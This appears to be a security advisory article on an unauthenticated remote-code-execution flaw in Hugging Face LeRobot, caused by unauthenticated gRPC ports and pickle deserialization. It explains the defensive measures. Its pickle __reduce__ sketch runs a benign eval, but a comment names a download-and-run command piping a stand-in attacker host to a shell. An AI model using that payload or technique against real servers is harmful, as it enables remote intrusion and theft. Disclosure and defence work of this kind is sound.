AI Under Control: Unauthenticated RCE Flaw Hits Hugging Face LeRobot

In the race to standardize AI for robotics, LeRobot has become a cornerstone for developers, amassing nearly 24,000 GitHub stars. However, a critical security disclosure has revealed that the very framework designed to control real-world robots could be turned against its users.

Tracked as CVE-2026-25874 with a staggering CVSS score of 9.3, this unpatched vulnerability allows unauthenticated attackers to execute arbitrary commands on host machines. For an AI infrastructure often granted elevated privileges to manage GPUs and high-value datasets, the implications are devastating, ranging from data exfiltration to the physical sabotage of connected robots.


The Vulnerability: Deserialization in the Dark

The flaw, discovered and documented by security researcher Chocapikk (Valentin Lobstein), resides in LeRobot’s async inference pipeline. This component offloads heavy AI computations to a remote “Policy Server.”

The Technical Breakdown

The PolicyServer and RobotClient communicate over gRPC channels. The vulnerability is fueled by two major security oversights:

  1. Insecure Ports: The server uses add_insecure_port(), meaning it lacks both encryption (TLS) and any form of authentication.
  2. Pickle Deserialization: The framework uses Python’s native pickle module to process incoming data.

Because pickle is an executable format rather than a passive data format like JSON, it can reconstruct entire Python objects. An attacker simply needs to send a specially crafted pickle payload through gRPC handlers like SendPolicyInstructions or SendObservations. The malicious code executes the moment the server calls pickle.loads(), long before the server ever checks whether the data is valid.
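A minimal, self-contained sketch shows why pickle is executable by nature. The class name is illustrative, and a benign eval call stands in for the attacker's command; this is not LeRobot's actual handler code:

```python
import pickle

class MaliciousPayload:
    # pickle calls __reduce__ to learn how to rebuild an object.
    # An attacker returns any callable plus its arguments, and that
    # callable runs the instant the bytes are deserialized.
    def __reduce__(self):
        # Benign stand-in; a real exploit would return something like
        # (os.system, ("curl attacker.example | sh",)).
        return (eval, ("6 * 7",))

blob = pickle.dumps(MaliciousPayload())  # what the attacker sends over gRPC
result = pickle.loads(blob)              # code executes here, on the server -> 42
```

Note that nothing in the payload has to match a type the server expects: execution happens inside pickle.loads() itself, before any validation logic can run.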


The Irony of the “# nosec” Tag

Perhaps the most alarming detail of this disclosure is the evidence of developer awareness. Researchers found that the source code contained # nosec tags positioned directly next to the dangerous pickle.loads() calls.

Note: In Python development, # nosec is a comment used to silence automated security linters (like Bandit) that flag insecure code.
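A hypothetical illustration of the pattern the researchers describe (not LeRobot's actual source): Bandit's B301 check flags every pickle.loads() call on untrusted input, and an inline # nosec comment suppresses that finding without changing the code's behavior.

```python
import pickle

def handle_message(raw_bytes: bytes):
    # Bandit would normally report B301 ("pickle can execute arbitrary
    # code") on the next line; "# nosec" silences the finding, so the
    # call vanishes from scan reports while remaining just as unsafe.
    return pickle.loads(raw_bytes)  # nosec B301
```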

Hugging Face famously pioneered the safetensors format to eliminate the exact “pickle-related” risks currently plaguing LeRobot. The decision to use the unsafe format—and then manually suppress the warnings—highlights a dangerous trade-off between development speed and system security.
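The contrast is easy to demonstrate with the standard library alone: a passive format such as JSON can only ever produce plain data (dicts, lists, strings, numbers, booleans, None), so loading untrusted bytes cannot trigger code the way pickle.loads() can. The field names below are illustrative, not LeRobot's actual message schema:

```python
import json

# Untrusted bytes off the wire. Worst case, json.loads raises a
# ValueError on malformed input; it can never invoke an
# attacker-chosen callable the way pickle.loads can.
raw = b'{"action": [0.1, -0.4], "timestep": 3}'
observation = json.loads(raw)
```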


The Blast Radius: From Server to Shop Floor

Because AI inference servers typically run with root or administrative privileges to access hardware resources, a successful exploit grants an attacker:

  • Administrative Control: Full access to the GPU server hosting the AI models.
  • Credential Theft: Exfiltration of Hugging Face API keys, SSH credentials, and proprietary model weights.
  • Physical Sabotage: Malicious commands sent to connected hardware, potentially causing dangerous or unintended robot movements in real-world environments.
  • Lateral Movement: Using the server as a “jump box” to attack other parts of the internal corporate network.

Affected Versions & Mitigation

The vulnerability currently affects all versions of LeRobot up to and including v0.5.1.

| Framework | Affected Versions | Status |
| --- | --- | --- |
| Hugging Face LeRobot | 0.4.3 – 0.5.1 | Unpatched (Critical) |


Immediate Defensive Measures

While a permanent fix (switching to safetensors and JSON) is planned for v0.6.0, organizations must act now:

  • Network Isolation: Ensure that the LeRobot async inference server is never exposed to the public internet.
  • Bind to Localhost: Configure the server to bind to 127.0.0.1 rather than 0.0.0.0 to prevent external network connections.
  • Enforce a VPN/Firewall: If remote access is required, place the gRPC port behind a strict VPN or mTLS-authenticated gateway.
  • Run with Least Privilege: Transition the service to run as a non-privileged user within a restricted container (e.g., Docker with AppArmor) to limit the damage of a potential breakout.
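The binding advice above can be sketched with the standard library; the same principle applies to the address string passed to gRPC's add_insecure_port(). The helper name and port are illustrative:

```python
import socket

def bind_loopback_only(port: int = 0) -> socket.socket:
    # 127.0.0.1 restricts the listener to the local machine. Binding to
    # 0.0.0.0 instead would accept connections on every network
    # interface, which is exactly what exposes vulnerable servers.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", port))  # port 0 lets the OS choose a free port
    s.listen()
    return s

listener = bind_loopback_only()
host, port = listener.getsockname()
```

With gRPC, the equivalent change is passing "127.0.0.1:PORT" rather than "0.0.0.0:PORT" to server.add_insecure_port(), then layering a VPN or an mTLS-authenticated gateway in front for any legitimate remote clients.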

Conclusion: No Convenience is Worth a Critical RCE

CVE-2026-25874 is a stark reminder that the AI “gold rush” cannot ignore basic security hygiene. As robotics moves from the lab to production, the frameworks we use must be as safe as the hardware they control. Until version 0.6.0 arrives, security teams must treat every unauthenticated gRPC port in their AI stack as a high-risk liability.
